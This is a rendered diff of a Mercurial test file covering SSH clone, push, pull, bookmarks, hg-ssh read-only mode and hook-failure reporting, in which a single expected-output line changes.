382 $ SSH_ORIGINAL_COMMAND="'hg' serve -R 'a'repo' --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
382 $ SSH_ORIGINAL_COMMAND="'hg' serve -R 'a'repo' --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
383 Illegal command "'hg' serve -R 'a'repo' --stdio": No closing quotation
383 Illegal command "'hg' serve -R 'a'repo' --stdio": No closing quotation
384 [255]
384 [255]
385
385
386 Test hg-ssh in read-only mode:
386 Test hg-ssh in read-only mode:
387
387
388 $ cat > ssh.sh << EOF
388 $ cat > ssh.sh << EOF
389 > userhost="\$1"
389 > userhost="\$1"
390 > SSH_ORIGINAL_COMMAND="\$2"
390 > SSH_ORIGINAL_COMMAND="\$2"
391 > export SSH_ORIGINAL_COMMAND
391 > export SSH_ORIGINAL_COMMAND
392 > PYTHONPATH="$PYTHONPATH"
392 > PYTHONPATH="$PYTHONPATH"
393 > export PYTHONPATH
393 > export PYTHONPATH
394 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
394 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
395 > EOF
395 > EOF
396
396
397 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
397 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
398 requesting all changes
398 requesting all changes
399 adding changesets
399 adding changesets
400 adding manifests
400 adding manifests
401 adding file changes
401 adding file changes
402 added 6 changesets with 5 changes to 4 files (+1 heads)
402 added 6 changesets with 5 changes to 4 files (+1 heads)
403 updating to branch default
403 updating to branch default
404 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
404 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
405
405
406 $ cd read-only-local
406 $ cd read-only-local
407 $ echo "baz" > bar
407 $ echo "baz" > bar
408 $ hg ci -A -m "unpushable commit" bar
408 $ hg ci -A -m "unpushable commit" bar
409 $ hg push --ssh "sh ../ssh.sh"
409 $ hg push --ssh "sh ../ssh.sh"
410 pushing to ssh://user@dummy/*/remote (glob)
410 pushing to ssh://user@dummy/*/remote (glob)
411 searching for changes
411 searching for changes
412 remote: Permission denied
412 remote: Permission denied
413 remote: abort: pretxnopen.hg-ssh hook failed
413 remote: abort: pretxnopen.hg-ssh hook failed
414 remote: Permission denied
414 remote: Permission denied
415 remote: pushkey-abort: prepushkey.hg-ssh hook failed
415 remote: pushkey-abort: prepushkey.hg-ssh hook failed
416 updating 6c0482d977a3 to public failed!
416 updating 6c0482d977a3 to public failed!
417 [1]
417 [1]
418
418
419 $ cd ..
419 $ cd ..
420
420
421 stderr from remote commands should be printed before stdout from local code (issue4336)
421 stderr from remote commands should be printed before stdout from local code (issue4336)
422
422
423 $ hg clone remote stderr-ordering
423 $ hg clone remote stderr-ordering
424 updating to branch default
424 updating to branch default
425 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
425 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
426 $ cd stderr-ordering
426 $ cd stderr-ordering
427 $ cat >> localwrite.py << EOF
427 $ cat >> localwrite.py << EOF
428 > from mercurial import exchange, extensions
428 > from mercurial import exchange, extensions
429 >
429 >
430 > def wrappedpush(orig, repo, *args, **kwargs):
430 > def wrappedpush(orig, repo, *args, **kwargs):
431 > res = orig(repo, *args, **kwargs)
431 > res = orig(repo, *args, **kwargs)
432 > repo.ui.write('local stdout\n')
432 > repo.ui.write('local stdout\n')
433 > return res
433 > return res
434 >
434 >
435 > def extsetup(ui):
435 > def extsetup(ui):
436 > extensions.wrapfunction(exchange, 'push', wrappedpush)
436 > extensions.wrapfunction(exchange, 'push', wrappedpush)
437 > EOF
437 > EOF
438
438
439 $ cat >> .hg/hgrc << EOF
439 $ cat >> .hg/hgrc << EOF
440 > [paths]
440 > [paths]
441 > default-push = ssh://user@dummy/remote
441 > default-push = ssh://user@dummy/remote
442 > [ui]
442 > [ui]
443 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
443 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
444 > [extensions]
444 > [extensions]
445 > localwrite = localwrite.py
445 > localwrite = localwrite.py
446 > EOF
446 > EOF
447
447
448 $ echo localwrite > foo
448 $ echo localwrite > foo
449 $ hg commit -m 'testing localwrite'
449 $ hg commit -m 'testing localwrite'
450 $ hg push
450 $ hg push
451 pushing to ssh://user@dummy/remote
451 pushing to ssh://user@dummy/remote
452 searching for changes
452 searching for changes
453 remote: adding changesets
453 remote: adding changesets
454 remote: adding manifests
454 remote: adding manifests
455 remote: adding file changes
455 remote: adding file changes
456 remote: added 1 changesets with 1 changes to 1 files
456 remote: added 1 changesets with 1 changes to 1 files
457 remote: KABOOM
457 remote: KABOOM
458 local stdout
458 local stdout
459
459
460 debug output
460 debug output
461
461
462 $ hg pull --debug ssh://user@dummy/remote
462 $ hg pull --debug ssh://user@dummy/remote
463 pulling from ssh://user@dummy/remote
463 pulling from ssh://user@dummy/remote
464 running .* ".*/dummyssh" user@dummy ('|")hg -R remote serve --stdio('|") (re)
464 running .* ".*/dummyssh" ['"]user@dummy['"] ('|")hg -R remote serve --stdio('|") (re)
465 sending hello command
465 sending hello command
466 sending between command
466 sending between command
467 remote: 355
467 remote: 355
468 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
468 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
469 remote: 1
469 remote: 1
470 preparing listkeys for "bookmarks"
470 preparing listkeys for "bookmarks"
471 sending listkeys command
471 sending listkeys command
472 received listkey for "bookmarks": 45 bytes
472 received listkey for "bookmarks": 45 bytes
473 query 1; heads
473 query 1; heads
474 sending batch command
474 sending batch command
475 searching for changes
475 searching for changes
476 all remote heads known locally
476 all remote heads known locally
477 no changes found
477 no changes found
478 preparing listkeys for "phases"
478 preparing listkeys for "phases"
479 sending listkeys command
479 sending listkeys command
480 received listkey for "phases": 15 bytes
480 received listkey for "phases": 15 bytes
481 checking for updated bookmarks
481 checking for updated bookmarks
482
482
483 $ cd ..
483 $ cd ..
484
484
485 $ cat dummylog
485 $ cat dummylog
486 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
486 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
487 Got arguments 1:user@dummy 2:hg -R /$TESTTMP/nonexistent serve --stdio
487 Got arguments 1:user@dummy 2:hg -R /$TESTTMP/nonexistent serve --stdio
488 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
488 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
489 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
489 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
490 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
490 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
491 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
491 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
492 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
492 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
493 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
493 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
494 Got arguments 1:user@dummy 2:hg -R local serve --stdio
494 Got arguments 1:user@dummy 2:hg -R local serve --stdio
495 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
495 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
496 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
496 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
497 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
497 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
498 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
498 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
499 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
499 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
500 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
500 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
501 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
501 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
502 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
502 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
503 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
503 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
504 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
504 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
507 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
507 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
509 Got arguments 1:user@dummy 2:hg init 'a repo'
509 Got arguments 1:user@dummy 2:hg init 'a repo'
510 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
510 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
511 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
511 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
512 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
512 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
513 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
513 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
514 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
514 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
515 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
515 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517
517
518 remote hook failure is attributed to remote
518 remote hook failure is attributed to remote
519
519
520 $ cat > $TESTTMP/failhook << EOF
520 $ cat > $TESTTMP/failhook << EOF
521 > def hook(ui, repo, **kwargs):
521 > def hook(ui, repo, **kwargs):
522 > ui.write('hook failure!\n')
522 > ui.write('hook failure!\n')
523 > ui.flush()
523 > ui.flush()
524 > return 1
524 > return 1
525 > EOF
525 > EOF
526
526
527 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
527 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
528
528
529 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
529 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
530 $ cd hookout
530 $ cd hookout
531 $ touch hookfailure
531 $ touch hookfailure
532 $ hg -q commit -A -m 'remote hook failure'
532 $ hg -q commit -A -m 'remote hook failure'
533 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
533 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
534 pushing to ssh://user@dummy/remote
534 pushing to ssh://user@dummy/remote
535 searching for changes
535 searching for changes
536 remote: adding changesets
536 remote: adding changesets
537 remote: adding manifests
537 remote: adding manifests
538 remote: adding file changes
538 remote: adding file changes
539 remote: added 1 changesets with 1 changes to 1 files
539 remote: added 1 changesets with 1 changes to 1 files
540 remote: hook failure!
540 remote: hook failure!
541 remote: transaction abort!
541 remote: transaction abort!
542 remote: rollback completed
542 remote: rollback completed
543 remote: abort: pretxnchangegroup.fail hook failed
543 remote: abort: pretxnchangegroup.fail hook failed
544 [1]
544 [1]
545
545
546 abort during pull is properly reported as such
546 abort during pull is properly reported as such
547
547
548 $ echo morefoo >> ../remote/foo
548 $ echo morefoo >> ../remote/foo
549 $ hg -R ../remote commit --message "more foo to be pulled"
549 $ hg -R ../remote commit --message "more foo to be pulled"
550 $ cat >> ../remote/.hg/hgrc << EOF
550 $ cat >> ../remote/.hg/hgrc << EOF
551 > [extensions]
551 > [extensions]
552 > crash = ${TESTDIR}/crashgetbundler.py
552 > crash = ${TESTDIR}/crashgetbundler.py
553 > EOF
553 > EOF
554 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
554 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
555 pulling from ssh://user@dummy/remote
555 pulling from ssh://user@dummy/remote
556 searching for changes
556 searching for changes
557 adding changesets
557 adding changesets
558 remote: abort: this is an exercise
558 remote: abort: this is an exercise
559 transaction abort!
559 transaction abort!
560 rollback completed
560 rollback completed
561 abort: stream ended unexpectedly (got 0 bytes, expected 4)
561 abort: stream ended unexpectedly (got 0 bytes, expected 4)
562 [255]
562 [255]
@@ -1,577 +1,577 b''
1
1
2 This test tries to exercise the ssh functionality with a dummy script
2 This test tries to exercise the ssh functionality with a dummy script
3
3
4 $ cat <<EOF >> $HGRCPATH
4 $ cat <<EOF >> $HGRCPATH
5 > [format]
5 > [format]
6 > usegeneraldelta=yes
6 > usegeneraldelta=yes
7 > EOF
7 > EOF
8
8
9 creating 'remote' repo
9 creating 'remote' repo
10
10
11 $ hg init remote
11 $ hg init remote
12 $ cd remote
12 $ cd remote
13 $ echo this > foo
13 $ echo this > foo
14 $ echo this > fooO
14 $ echo this > fooO
15 $ hg ci -A -m "init" foo fooO
15 $ hg ci -A -m "init" foo fooO
16
16
17 insert a closed branch (issue4428)
17 insert a closed branch (issue4428)
18
18
19 $ hg up null
19 $ hg up null
20 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
20 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
21 $ hg branch closed
21 $ hg branch closed
22 marked working directory as branch closed
22 marked working directory as branch closed
23 (branches are permanent and global, did you want a bookmark?)
23 (branches are permanent and global, did you want a bookmark?)
24 $ hg ci -mc0
24 $ hg ci -mc0
25 $ hg ci --close-branch -mc1
25 $ hg ci --close-branch -mc1
26 $ hg up -q default
26 $ hg up -q default
27
27
28 configure for serving
28 configure for serving
29
29
30 $ cat <<EOF > .hg/hgrc
30 $ cat <<EOF > .hg/hgrc
31 > [server]
31 > [server]
32 > uncompressed = True
32 > uncompressed = True
33 >
33 >
34 > [hooks]
34 > [hooks]
35 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
35 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
36 > EOF
36 > EOF
37 $ cd ..
37 $ cd ..
38
38
39 repo not found error
39 repo not found error
40
40
41 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
41 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
42 remote: abort: repository nonexistent not found!
42 remote: abort: repository nonexistent not found!
43 abort: no suitable response from remote hg!
43 abort: no suitable response from remote hg!
44 [255]
44 [255]
45
45
46 non-existent absolute path
46 non-existent absolute path
47
47
48 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/`pwd`/nonexistent local
48 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/`pwd`/nonexistent local
49 remote: abort: repository $TESTTMP/nonexistent not found!
49 remote: abort: repository $TESTTMP/nonexistent not found!
50 abort: no suitable response from remote hg!
50 abort: no suitable response from remote hg!
51 [255]
51 [255]
52
52
53 clone remote via stream
53 clone remote via stream
54
54
55 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
55 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
56 streaming all changes
56 streaming all changes
57 4 files to transfer, 602 bytes of data
57 4 files to transfer, 602 bytes of data
58 transferred 602 bytes in * seconds (*) (glob)
58 transferred 602 bytes in * seconds (*) (glob)
59 searching for changes
59 searching for changes
60 no changes found
60 no changes found
61 updating to branch default
61 updating to branch default
62 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
62 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
63 $ cd local-stream
63 $ cd local-stream
64 $ hg verify
64 $ hg verify
65 checking changesets
65 checking changesets
66 checking manifests
66 checking manifests
67 crosschecking files in changesets and manifests
67 crosschecking files in changesets and manifests
68 checking files
68 checking files
69 2 files, 3 changesets, 2 total revisions
69 2 files, 3 changesets, 2 total revisions
70 $ hg branches
70 $ hg branches
71 default 0:1160648e36ce
71 default 0:1160648e36ce
72 $ cd ..
72 $ cd ..
73
73
74 clone bookmarks via stream
74 clone bookmarks via stream
75
75
76 $ hg -R local-stream book mybook
76 $ hg -R local-stream book mybook
77 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
77 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
78 streaming all changes
78 streaming all changes
79 4 files to transfer, 602 bytes of data
79 4 files to transfer, 602 bytes of data
80 transferred 602 bytes in * seconds (*) (glob)
80 transferred 602 bytes in * seconds (*) (glob)
81 searching for changes
81 searching for changes
82 no changes found
82 no changes found
83 updating to branch default
83 updating to branch default
84 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
84 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
85 $ cd stream2
85 $ cd stream2
86 $ hg book
86 $ hg book
87 mybook 0:1160648e36ce
87 mybook 0:1160648e36ce
88 $ cd ..
88 $ cd ..
89 $ rm -rf local-stream stream2
89 $ rm -rf local-stream stream2
90
90
91 clone remote via pull
91 clone remote via pull
92
92
93 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
93 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
94 requesting all changes
94 requesting all changes
95 adding changesets
95 adding changesets
96 adding manifests
96 adding manifests
97 adding file changes
97 adding file changes
98 added 3 changesets with 2 changes to 2 files
98 added 3 changesets with 2 changes to 2 files
99 updating to branch default
99 updating to branch default
100 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
100 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
101
101
102 verify
102 verify
103
103
104 $ cd local
104 $ cd local
105 $ hg verify
105 $ hg verify
106 checking changesets
106 checking changesets
107 checking manifests
107 checking manifests
108 crosschecking files in changesets and manifests
108 crosschecking files in changesets and manifests
109 checking files
109 checking files
110 2 files, 3 changesets, 2 total revisions
110 2 files, 3 changesets, 2 total revisions
111 $ cat >> .hg/hgrc <<EOF
111 $ cat >> .hg/hgrc <<EOF
112 > [hooks]
112 > [hooks]
113 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
113 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
114 > EOF
114 > EOF
115
115
116 empty default pull
116 empty default pull
117
117
118 $ hg paths
118 $ hg paths
119 default = ssh://user@dummy/remote
119 default = ssh://user@dummy/remote
120 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
120 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
121 pulling from ssh://user@dummy/remote
121 pulling from ssh://user@dummy/remote
122 searching for changes
122 searching for changes
123 no changes found
123 no changes found
124
124
125 pull from wrong ssh URL
125 pull from wrong ssh URL
126
126
127 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
127 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
128 pulling from ssh://user@dummy/doesnotexist
128 pulling from ssh://user@dummy/doesnotexist
129 remote: abort: repository doesnotexist not found!
129 remote: abort: repository doesnotexist not found!
130 abort: no suitable response from remote hg!
130 abort: no suitable response from remote hg!
131 [255]
131 [255]
132
132
133 local change
133 local change
134
134
135 $ echo bleah > foo
135 $ echo bleah > foo
136 $ hg ci -m "add"
136 $ hg ci -m "add"
137
137
138 updating rc
138 updating rc
139
139
140 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
140 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
141 $ echo "[ui]" >> .hg/hgrc
141 $ echo "[ui]" >> .hg/hgrc
142 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
142 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
143
143
144 find outgoing
144 find outgoing
145
145
146 $ hg out ssh://user@dummy/remote
146 $ hg out ssh://user@dummy/remote
147 comparing with ssh://user@dummy/remote
147 comparing with ssh://user@dummy/remote
148 searching for changes
148 searching for changes
149 changeset: 3:a28a9d1a809c
149 changeset: 3:a28a9d1a809c
150 tag: tip
150 tag: tip
151 parent: 0:1160648e36ce
151 parent: 0:1160648e36ce
152 user: test
152 user: test
153 date: Thu Jan 01 00:00:00 1970 +0000
153 date: Thu Jan 01 00:00:00 1970 +0000
154 summary: add
154 summary: add
155
155
156
156
157 find incoming on the remote side
157 find incoming on the remote side
158
158
159 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
159 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
160 comparing with ssh://user@dummy/local
160 comparing with ssh://user@dummy/local
161 searching for changes
161 searching for changes
162 changeset: 3:a28a9d1a809c
162 changeset: 3:a28a9d1a809c
163 tag: tip
163 tag: tip
164 parent: 0:1160648e36ce
164 parent: 0:1160648e36ce
165 user: test
165 user: test
166 date: Thu Jan 01 00:00:00 1970 +0000
166 date: Thu Jan 01 00:00:00 1970 +0000
167 summary: add
167 summary: add
168
168
169
169
170 find incoming on the remote side (using absolute path)
170 find incoming on the remote side (using absolute path)
171
171
172 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
172 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
173 comparing with ssh://user@dummy/$TESTTMP/local
173 comparing with ssh://user@dummy/$TESTTMP/local
174 searching for changes
174 searching for changes
175 changeset: 3:a28a9d1a809c
175 changeset: 3:a28a9d1a809c
176 tag: tip
176 tag: tip
177 parent: 0:1160648e36ce
177 parent: 0:1160648e36ce
178 user: test
178 user: test
179 date: Thu Jan 01 00:00:00 1970 +0000
179 date: Thu Jan 01 00:00:00 1970 +0000
180 summary: add
180 summary: add
181
181
182
182
183 push
183 push
184
184
185 $ hg push
185 $ hg push
186 pushing to ssh://user@dummy/remote
186 pushing to ssh://user@dummy/remote
187 searching for changes
187 searching for changes
188 remote: adding changesets
188 remote: adding changesets
189 remote: adding manifests
189 remote: adding manifests
190 remote: adding file changes
190 remote: adding file changes
191 remote: added 1 changesets with 1 changes to 1 files
191 remote: added 1 changesets with 1 changes to 1 files
192 $ cd ../remote
192 $ cd ../remote
193
193
194 check remote tip
194 check remote tip
195
195
196 $ hg tip
196 $ hg tip
197 changeset: 3:a28a9d1a809c
197 changeset: 3:a28a9d1a809c
198 tag: tip
198 tag: tip
199 parent: 0:1160648e36ce
199 parent: 0:1160648e36ce
200 user: test
200 user: test
201 date: Thu Jan 01 00:00:00 1970 +0000
201 date: Thu Jan 01 00:00:00 1970 +0000
202 summary: add
202 summary: add
203
203
204 $ hg verify
204 $ hg verify
205 checking changesets
205 checking changesets
206 checking manifests
206 checking manifests
207 crosschecking files in changesets and manifests
207 crosschecking files in changesets and manifests
208 checking files
208 checking files
209 2 files, 4 changesets, 3 total revisions
209 2 files, 4 changesets, 3 total revisions
210 $ hg cat -r tip foo
210 $ hg cat -r tip foo
211 bleah
211 bleah
212 $ echo z > z
212 $ echo z > z
213 $ hg ci -A -m z z
213 $ hg ci -A -m z z
214 created new head
214 created new head
215
215
216 test pushkeys and bookmarks
216 test pushkeys and bookmarks
217
217
218 $ cd ../local
218 $ cd ../local
219 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
219 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
220 bookmarks
220 bookmarks
221 namespaces
221 namespaces
222 phases
222 phases
223 $ hg book foo -r 0
223 $ hg book foo -r 0
224 $ hg out -B
224 $ hg out -B
225 comparing with ssh://user@dummy/remote
225 comparing with ssh://user@dummy/remote
226 searching for changed bookmarks
226 searching for changed bookmarks
227 foo 1160648e36ce
227 foo 1160648e36ce
228 $ hg push -B foo
228 $ hg push -B foo
229 pushing to ssh://user@dummy/remote
229 pushing to ssh://user@dummy/remote
230 searching for changes
230 searching for changes
231 no changes found
231 no changes found
232 exporting bookmark foo
232 exporting bookmark foo
233 [1]
233 [1]
234 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
234 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
235 foo 1160648e36cec0054048a7edc4110c6f84fde594
235 foo 1160648e36cec0054048a7edc4110c6f84fde594
236 $ hg book -f foo
236 $ hg book -f foo
237 $ hg push --traceback
237 $ hg push --traceback
238 pushing to ssh://user@dummy/remote
238 pushing to ssh://user@dummy/remote
239 searching for changes
239 searching for changes
240 no changes found
240 no changes found
241 updating bookmark foo
241 updating bookmark foo
242 [1]
242 [1]
243 $ hg book -d foo
243 $ hg book -d foo
244 $ hg in -B
244 $ hg in -B
245 comparing with ssh://user@dummy/remote
245 comparing with ssh://user@dummy/remote
246 searching for changed bookmarks
246 searching for changed bookmarks
247 foo a28a9d1a809c
247 foo a28a9d1a809c
248 $ hg book -f -r 0 foo
248 $ hg book -f -r 0 foo
249 $ hg pull -B foo
249 $ hg pull -B foo
250 pulling from ssh://user@dummy/remote
250 pulling from ssh://user@dummy/remote
251 no changes found
251 no changes found
252 updating bookmark foo
252 updating bookmark foo
253 $ hg book -d foo
253 $ hg book -d foo
254 $ hg push -B foo
254 $ hg push -B foo
255 pushing to ssh://user@dummy/remote
255 pushing to ssh://user@dummy/remote
256 searching for changes
256 searching for changes
257 no changes found
257 no changes found
258 deleting remote bookmark foo
258 deleting remote bookmark foo
259 [1]
259 [1]
260
260
261 a bad, evil hook that prints to stdout
261 a bad, evil hook that prints to stdout
262
262
263 $ cat <<EOF > $TESTTMP/badhook
263 $ cat <<EOF > $TESTTMP/badhook
264 > import sys
264 > import sys
265 > sys.stdout.write("KABOOM\n")
265 > sys.stdout.write("KABOOM\n")
266 > EOF
266 > EOF
267
267
268 $ cat <<EOF > $TESTTMP/badpyhook.py
268 $ cat <<EOF > $TESTTMP/badpyhook.py
269 > import sys
269 > import sys
270 > def hook(ui, repo, hooktype, **kwargs):
270 > def hook(ui, repo, hooktype, **kwargs):
271 > sys.stdout.write("KABOOM IN PROCESS\n")
